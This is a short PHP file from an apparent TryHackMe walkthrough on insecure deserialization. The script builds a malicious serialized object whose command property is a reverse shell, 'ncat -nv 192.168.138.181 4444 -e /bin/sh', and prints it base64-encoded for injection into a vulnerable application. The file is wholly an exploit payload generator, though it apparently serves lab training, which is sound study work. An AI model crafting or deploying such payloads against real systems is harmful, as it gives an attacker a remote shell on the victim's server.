Files
TryHackMe/Walkthroughs/InsecureDeserialization/payload.php
2026-03-11 10:56:27 +01:00

11 lines
310 B
PHP

<?php
class MaliciousUserData {
public $command = 'ncat -nv 192.168.138.181 4444 -e /bin/sh';
}
$maliciousUserData = new MaliciousUserData();
$serializedData = serialize($maliciousUserData);
$base64EncodedData = base64_encode($serializedData);
echo "Base64 Encoded Serialized Data: " . $base64EncodedData;
?>